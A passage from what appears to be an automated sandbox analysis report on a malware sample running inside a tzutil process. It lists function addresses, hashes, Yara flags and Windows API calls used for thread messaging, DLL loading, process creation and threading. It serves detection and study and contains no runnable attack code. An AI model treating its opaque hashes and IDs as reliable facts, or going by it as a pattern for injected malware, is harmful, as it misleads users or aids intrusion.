                                                    • Opcode Fuzzy Hash: 5ad20d37507022d2f2273f13ea7a713b5c9947c9313c6518467cc18144a7028d
                                                    • Instruction Fuzzy Hash: C390022160140902D101B258444465A000BC7E0341FD5C023A1024959ECB258A92A135
                                                    Function 03472D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: a54b2899dfc8ca35ca12bdcca9794f85d5d64e0c25401c02d4e9d8d88d6ee4f3
                                                    • Instruction ID: ffc033f7e1f6c6890b4aac20874f2776d581f4be96ba09313c4e47e33bd37ac5
                                                    • Opcode Fuzzy Hash: a54b2899dfc8ca35ca12bdcca9794f85d5d64e0c25401c02d4e9d8d88d6ee4f3
                                                    • Instruction Fuzzy Hash: D790022921340402D180B258544864E0006C7E1302FD5D416A001595CCCB1589695325
                                                    Function 03472D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: f2c96e209ac0d30abacb3cdfe97c92a9a03af4fdca27059db6f32e8a6a1893c8
                                                    • Instruction ID: 3e068da38f2575aa266daf77abc10c18cfa6c1e4e4eb60675e31b78fc05b6fb4
                                                    • Opcode Fuzzy Hash: f2c96e209ac0d30abacb3cdfe97c92a9a03af4fdca27059db6f32e8a6a1893c8
                                                    • Instruction Fuzzy Hash: E690022130140403D140B258545864A4006D7F1301F95D012E0414958CDB1589565226
                                                    Function 03472DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 9c92a54f9a4b905a300c94c250f8182f472e4bfe2beb934851d46e0a235b45dd
                                                    • Instruction ID: 59f5aeeb119ec5e2b9127aed687eddae7065d09bc08c4bfc827971450e953640
                                                    • Opcode Fuzzy Hash: 9c92a54f9a4b905a300c94c250f8182f472e4bfe2beb934851d46e0a235b45dd
                                                    • Instruction Fuzzy Hash: 60900221242445525545F258444454B4007D7F03417D5C013A1414D54C87269956D625
                                                    Function 03472DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 46977b51b773d13d9b7de835fdf2022ba2715e9f56745a477666e3357d74669c
                                                    • Instruction ID: a81098e5722d36f428ef954467ae2455a47630f9ac59229d58944769b4d7c5f7
                                                    • Opcode Fuzzy Hash: 46977b51b773d13d9b7de835fdf2022ba2715e9f56745a477666e3357d74669c
                                                    • Instruction Fuzzy Hash: A890023120140813D111B258454474B000AC7E0341FD5C413A042495CD97568A52A125
                                                    Function 03472C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: c1515ba76762767aee053f2ff061a1d560423c64ed3c9c577a0706a4e807a2e5
                                                    • Instruction ID: bac37f058a9e44e3df3b834c4ea919e15cc8c498e56e899edf1770c556259564
                                                    • Opcode Fuzzy Hash: c1515ba76762767aee053f2ff061a1d560423c64ed3c9c577a0706a4e807a2e5
                                                    • Instruction Fuzzy Hash: DA90023120140C42D100B2584444B8A0006C7F0301F95C017A0124A58D8715C9517525
                                                    Function 03472C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: f2b091017c9f28c8a900117e2b27d45c1c94003280a1e4a53f373666f3404167
                                                    • Instruction ID: b67a08933cf5a815060eef9f3b48562ffb39c8f438640fc5365241e215c9c810
                                                    • Opcode Fuzzy Hash: f2b091017c9f28c8a900117e2b27d45c1c94003280a1e4a53f373666f3404167
                                                    • Instruction Fuzzy Hash: 5F90023120148C02D110B258844478E0006C7E0301F99C412A4424A5CD879589917125
                                                    Function 03472CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 37e6147fe09257f3122507df560be3285eef27172d5cc52c7f670308aa226da7
                                                    • Instruction ID: 946a263a7d4d4efd4ba6c07d996a6645221cdf0dd07269b2c62c99fa2a5343fa
                                                    • Opcode Fuzzy Hash: 37e6147fe09257f3122507df560be3285eef27172d5cc52c7f670308aa226da7
                                                    • Instruction Fuzzy Hash: 4790023120140802D100B698544868A0006C7F0301F95D012A5024959EC76589916135
                                                    Function 0097114D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87threadwindowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 429 97114d-971158 430 97115a-971166 429->430 431 9711d8-971247 call 98b890 call 98c2a0 call 974990 call 9613e0 call 982000 429->431 433 9711c3-9711d4 430->433 434 971168 430->434 445 971267-97126d 431->445 446 971249-971258 PostThreadMessageW 431->446 434->433 446->445 447 97125a-971264 446->447 447->445
                                                    APIs
                                                    • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00971254
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID: UQ63g7r-$UQ63g7r-
                                                    • API String ID: 1836367815-2341035416
                                                    • Opcode ID: e1c25d61a32346dc8d004d841f9ed90adaa04ebb10f9600b25de5f3ab2dbb7f9
                                                    • Instruction ID: 05a247ef3300413ac8637f0688038c1ef9fe8c46e09760ad98c0cc8695fdcbc8
                                                    • Opcode Fuzzy Hash: e1c25d61a32346dc8d004d841f9ed90adaa04ebb10f9600b25de5f3ab2dbb7f9
                                                    • Instruction Fuzzy Hash: 0F21F972A0424C7FEB01AE959C83DEF7B7CEF81794F048169F908AB241D6249D0587E1
                                                    Function 009711D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66threadwindowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 448 9711d6-971247 call 98b890 call 98c2a0 call 974990 call 9613e0 call 982000 460 971267-97126d 448->460 461 971249-971258 PostThreadMessageW 448->461 461->460 462 97125a-971264 461->462 462->460
                                                    APIs
                                                    • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00971254
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID: UQ63g7r-$UQ63g7r-
                                                    • API String ID: 1836367815-2341035416
                                                    • Opcode ID: 628f241b7f1b559bfb0e8fdbb7383d1f4dc0679f126a59f5884e36911a76a547
                                                    • Instruction ID: 0cfc686aeaad88a924c79f9f575363c474c246cc939c54308a96f123fc608cd8
                                                    • Opcode Fuzzy Hash: 628f241b7f1b559bfb0e8fdbb7383d1f4dc0679f126a59f5884e36911a76a547
                                                    • Instruction Fuzzy Hash: 3B1152B290124C7AEB10ABE45C82EEF7B6CDB81694F048159FA54B7241D6245E058BA1
                                                    Function 009711E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 463 9711e0-971247 call 98b890 call 98c2a0 call 974990 call 9613e0 call 982000 474 971267-97126d 463->474 475 971249-971258 PostThreadMessageW 463->475 475->474 476 97125a-971264 475->476 476->474
                                                    APIs
                                                    • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00971254
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID: UQ63g7r-$UQ63g7r-
                                                    • API String ID: 1836367815-2341035416
                                                    • Opcode ID: f03869fda7b0d1a7782fc448fc1cae66ffdd3959067e50402559fb878f61b7a5
                                                    • Instruction ID: f7a20c3f7d575a168829fe0db4fd195bc98d6a778b50f47d3a5f5565a4fb5b95
                                                    • Opcode Fuzzy Hash: f03869fda7b0d1a7782fc448fc1cae66ffdd3959067e50402559fb878f61b7a5
                                                    • Instruction Fuzzy Hash: E00184B2D0024C7BEB10ABE49C82EEF7B7C9F81794F048058FA18B7241D6345E058BB1
                                                    Function 00983E10 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 107sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Sleep.KERNELBASE(000007D0), ref: 00983EDD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID: net.dll$wininet.dll
                                                    • API String ID: 3472027048-1269752229
                                                    • Opcode ID: c03434077a262bb91a166c5ced5b1df84fe2de735978dd3df07cd974cc944c52
                                                    • Instruction ID: b9f4a7c19b4102bfac9d1bf2c4927b10194a10d67ad5feecbeea8d73ad3c4cd2
                                                    • Opcode Fuzzy Hash: c03434077a262bb91a166c5ced5b1df84fe2de735978dd3df07cd974cc944c52
                                                    • Instruction Fuzzy Hash: D1316DB1A01705BBD714EFA4CC81FEBBBB9EB88710F048119F61D9B341D774AA008BA4
                                                    Function 0097F8DD Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InitializeUninitialize
                                                    • String ID: @J7<
                                                    • API String ID: 3442037557-2016760708
                                                    • Opcode ID: e3ac8dca9d4a5e2f21f3405cabb02933aee54d61612d24bb33dfc2b886692964
                                                    • Instruction ID: ad3a2331c40fc59304e9ba35a54f8290db18c5a0f01a850ddd6cbbbd2cd4183f
                                                    • Opcode Fuzzy Hash: e3ac8dca9d4a5e2f21f3405cabb02933aee54d61612d24bb33dfc2b886692964
                                                    • Instruction Fuzzy Hash: 0E311076A0060AAFDB10DFD8C8809EFB7B9FF88304F108559E505E7214D775AE458BA0
                                                    Function 0097F8E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InitializeUninitialize
                                                    • String ID: @J7<
                                                    • API String ID: 3442037557-2016760708
                                                    • Opcode ID: 1f689e5722081d79dd2b489bdd5053e9c44b1b93b73407c68c5540e258936cf8
                                                    • Instruction ID: 94b412c71ef6c8d03d6e202c413efce3e85115df7aab9a431c1907da47e7d2dc
                                                    • Opcode Fuzzy Hash: 1f689e5722081d79dd2b489bdd5053e9c44b1b93b73407c68c5540e258936cf8
                                                    • Instruction Fuzzy Hash: BC312176A0060AAFDB00DFD8C8809EFB7B9FF88304F108559E505A7214D775EE058BA0
                                                    Function 00974A0B Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 59613f67ab0b44fc569472441be565e37fa422d4333c6dd1dd2efb647779117c
                                                    • Instruction ID: 56d4b627e8c4969071415834e5e6f285e17f86e7d271bfbb5ed17138d1375155
                                                    • Opcode Fuzzy Hash: 59613f67ab0b44fc569472441be565e37fa422d4333c6dd1dd2efb647779117c
                                                    • Instruction Fuzzy Hash: 7E21E1777802051FC715CA68D882BF9B72CEB92325F108298F918CF382EB215E16C7E5
                                                    Function 00974A25 Relevance: 1.6, APIs: 1, Instructions: 96libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00974A02
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: aa15e0bea88f3d3eb8164487ffdb839de0913709777854031ac92b482dca4ce8
                                                    • Instruction ID: fe322eea2e866233917d5628c017281565d5023ef1ac482add8df3cbfe0b720a
                                                    • Opcode Fuzzy Hash: aa15e0bea88f3d3eb8164487ffdb839de0913709777854031ac92b482dca4ce8
                                                    • Instruction Fuzzy Hash: E721CD3764015A9FCB15CE28C845AFAFF6CEB92714B25C2E8D46C8B243E3329C06C795
                                                    Function 00974990 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00974A02
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                    • Instruction ID: 095c43477d8e41e65184e7a701032ec6988cd979324f4c91d97c58976d33425a
                                                    • Opcode Fuzzy Hash: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                    • Instruction Fuzzy Hash: 760112B6D4010DB7DB10EAA4DC42F9EB3789B54708F008195EA0C97242F671EB14CB91
                                                    Function 00989B50 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateProcessInternalW.KERNELBASE(?,?,?,?,00978724,00000010,?,?,?,00000044,?,00000010,00978724,?,?,?), ref: 00989BB3
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateInternalProcess
                                                    • String ID:
                                                    • API String ID: 2186235152-0
                                                    • Opcode ID: ba0705d331adb0827d90e0a0c05e4e99946108ce1be150fedcd619b1613f899a
                                                    • Instruction ID: f93f2bdb28b6f0d426e5c622271d3a00b616d1e9b0c38925b204551cf27726a9
                                                    • Opcode Fuzzy Hash: ba0705d331adb0827d90e0a0c05e4e99946108ce1be150fedcd619b1613f899a
                                                    • Instruction Fuzzy Hash: BE01CCB2215108BBCB04DE99DC91EEB77ADEF8C754F108208FA09E3240D631F8518BA4
                                                    Function 00969F20 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00969F62
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateThread
                                                    • String ID:
                                                    • API String ID: 2422867632-0
                                                    • Opcode ID: c463900b9fbcea7865d729dbd8ce692ca1e0d4df9bad2f7c5cf101c691f30119
                                                    • Instruction ID: e5ce162146bfa75f13391c33a8af8e2e6f8d653d1da954667f8175cbc18469e2
                                                    • Opcode Fuzzy Hash: c463900b9fbcea7865d729dbd8ce692ca1e0d4df9bad2f7c5cf101c691f30119
                                                    • Instruction Fuzzy Hash: 6FF0ED7338071436E22076E99C02FDBB79C9BC5B65F650026F60DEE6C1D9A6F80187A5
                                                    Function 00969F1A Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00969F62
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateThread
                                                    • String ID:
                                                    • API String ID: 2422867632-0
                                                    • Opcode ID: 5b05dc4f9ac00e1fb97425b4699cabbd5fdff5ea68f0ab42ae6c2005985b54c1
                                                    • Instruction ID: 427f480b86c5b479cc96133ddd8cf5ff15e48adef19ad429b540d54931bb9646
                                                    • Opcode Fuzzy Hash: 5b05dc4f9ac00e1fb97425b4699cabbd5fdff5ea68f0ab42ae6c2005985b54c1
                                                    • Instruction Fuzzy Hash: DDF065726407103AE73076A88C02FDBA79C8F95B50F250119F609EF6C1D5A5B80587A5
                                                    Function 00989A90 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00971E59,?,00985F17,00971E59,?,00985F17,?,00971E59,009859BF,00001000,?,00000000), ref: 00989AC9
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: ac00b1638777126d2cea74cea7df9c0d5320b23dccd002bc6f264aef07eeb62c
                                                    • Instruction ID: 81bc008401607a4b863c2fc7932f916fcc8bbc5e8a34fb05e9f6eedde21b3ec9
                                                    • Opcode Fuzzy Hash: ac00b1638777126d2cea74cea7df9c0d5320b23dccd002bc6f264aef07eeb62c
                                                    • Instruction Fuzzy Hash: 7AE01A762142187BD614EF59DC41F9B77ADEFC9710F004419FA48A7241DA72B9108BB9
                                                    Function 00989AD0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,3777EA40,00000007,00000000,00000004,00000000,00974211,000000F4), ref: 00989B09
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    • Opcode ID: b80920223b0d3d6ec0276f1483e88535983c36a14dc249cb946427c0f6602cca
                                                    • Instruction ID: 9cf49258f507f637c10d30a769f4462d313016a3af57e6286c30edd407c1f014
                                                    • Opcode Fuzzy Hash: b80920223b0d3d6ec0276f1483e88535983c36a14dc249cb946427c0f6602cca
                                                    • Instruction Fuzzy Hash: 82E09A72200304BBD620EF58DC42FAB73ADEFC9B10F004419F908A7342C631B8208BB4
                                                    Function 00978760 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 0097878A
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: b2fdd7f5a1d97f55da9e9883e388d1a9d0ed00b807dd1d66f4156bc78fba80a9
                                                    • Instruction ID: c82e51120f60d89383164a02ea1bb7ae72cc2882efaa1afc0d5c3dfecb0ff72d
                                                    • Opcode Fuzzy Hash: b2fdd7f5a1d97f55da9e9883e388d1a9d0ed00b807dd1d66f4156bc78fba80a9
                                                    • Instruction Fuzzy Hash: C8E086762802042BFF186AA89C4AF67339C4BC8734F288E50BA1DDB2C2D974F9018A54
                                                    Function 00978560 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNELBASE(00008003,?,?,00972150,009882FF,?,0097211B), ref: 00978591
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: 8078e4b5b8cf14619579fb5ecae74e25a8c9f02cfd6a8169a37789255bfbf125
                                                    • Instruction ID: 432ff0475fee6e86e2254cf35f27ced5e03124000bafe2363214b30eaa35a66f
                                                    • Opcode Fuzzy Hash: 8078e4b5b8cf14619579fb5ecae74e25a8c9f02cfd6a8169a37789255bfbf125
                                                    • Instruction Fuzzy Hash: 02D05E723803043BFA00A6E49C47F56328C4B44751F4540A4BA0CEA3C2DD61F5008A65
                                                    Function 03472C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 361699771760aa7245790f27e8a9b46a8e6ad34475901b572e98c609debcbedf
                                                    • Instruction ID: 8f8620567cc94c6ef084f93af80d3e55f75ec2df566e58a965bfb607d0785538
                                                    • Opcode Fuzzy Hash: 361699771760aa7245790f27e8a9b46a8e6ad34475901b572e98c609debcbedf
                                                    • Instruction Fuzzy Hash: 91B09B719015C5C9DA11F760460875B7905A7E0701F59C463D3030A55E4779C1D1E179

                                                    Non-executed Functions

                                                    Function 033004D0 Relevance: .1, Instructions: 149COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538113397.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3300000_tzutil.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
